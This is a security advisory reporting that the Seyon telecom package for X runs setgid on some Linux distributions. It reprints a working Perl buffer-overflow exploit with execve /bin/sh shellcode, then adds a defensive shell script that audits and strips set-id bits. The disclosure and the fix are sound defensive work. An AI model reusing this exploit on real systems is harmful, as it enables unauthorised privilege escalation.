COMMAND

    Seyon

SYSTEMS AFFECTED

    Seyon

PROBLEM

    teleh0r found the following.  Seyon, which is a telecommunications
    package for the X Window System, is not intended to run as
    setuid/setgid; however, we believe that it does on some
    distributions.  On the DLD Distribution and Turbolinux Distro
    we believe it runs as setgid.

    #!/usr/bin/perl

    ## Seyon Exploit / Tested Version: Version 2.1 rev. 4b i586-Linux
    ## teleh0r@doglover.com / Tested rpm from: DLD Distribution (5.04)
    ##
    ## Greets: Scrippie, *@HWA, grazer, mixter, pr0ix, s\, jim
    ## http://www.digit-labs.org/ || http://teleh0r.cjb.net/


    $shellcode ="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
                "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
                "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
                "\xff\xff/bin/sh";

    $ret = 0xbfffef64;
    $egg = 500;
    $len = 208;
    $nop = 'A';

    if (@ARGV == 1) {
        $offset = $ARGV[0];
    }

    $buffer .= "?"; #  (Length: 209)
    $new_ret = pack('l',($ret + $offset));

    print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");
    sleep(1);

    for ($i = 0; $i < $len; $i += 4) {
        $buffer .= pack('l',($ret + $offset));
    }

    for ($i = 0; $i < ($egg - length($shellcode)); $i++) {
        $buffer .= $nop;
    }

    $buffer .= $shellcode; local($ENV{DISPLAY}) = '0:0';
    exec("/usr/X11R6/bin/seyon -noemulator \"$buffer\"");

SOLUTION

    Nothing yet.  Seyon is known to be broken (and has been for
    years).  The author can't be found, it seems, so it should have
    been removed from all distributions by now.  According to the
    Debian package's copyright, in May of 1999 the author changed the
    license to GPL.
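
    Since Seyon is not intended to run setuid/setgid and no fix exists,
    an administrator can check for and clear the bits.  The script below
    is an added example, not part of the original advisory; the function
    names check_setid, strip_setid and audit_setid are hypothetical, and
    the default path is the one used in the exploit script above.

```shell
#!/bin/sh
# Added example: audit binaries that were never meant to carry set-id bits.
# SEYON_PATH is the install path quoted in the advisory's exploit script.
SEYON_PATH="/usr/X11R6/bin/seyon"

# check_setid FILE: prints setuid, setgid, "setuid,setgid", none or missing.
check_setid() {
    f=$1
    [ -e "$f" ] || { echo "missing"; return 0; }
    bits=""
    if [ -u "$f" ]; then bits="setuid"; fi
    if [ -g "$f" ]; then bits="${bits:+$bits,}setgid"; fi
    echo "${bits:-none}"
}

# strip_setid FILE: clears both set-id bits, leaves other mode bits alone.
strip_setid() {
    chmod u-s,g-s -- "$1"
}

# audit_setid [--fix] FILE...: reports each file; with --fix, clears the
# bits and re-checks. Returns 1 if any file still has a set-id bit.
audit_setid() {
    fix=0
    if [ "$1" = "--fix" ]; then fix=1; shift; fi
    rc=0
    for f in "$@"; do
        state=$(check_setid "$f")
        if [ "$fix" -eq 1 ] && [ "$state" != "none" ] && [ "$state" != "missing" ]; then
            if strip_setid "$f"; then state="$state -> $(check_setid "$f")"; fi
        fi
        printf '%s: %s\n' "$f" "$state"
        case $state in
            none|missing|*"-> none") ;;
            *) rc=1 ;;
        esac
    done
    return "$rc"
}

# Stand-alone use: with no arguments, report on the default path (read-only).
if [ "$#" -eq 0 ]; then set -- "$SEYON_PATH"; fi
audit_setid "$@"
```

    A package reinstall or upgrade can restore the original mode, so the
    check is worth repeating after package operations.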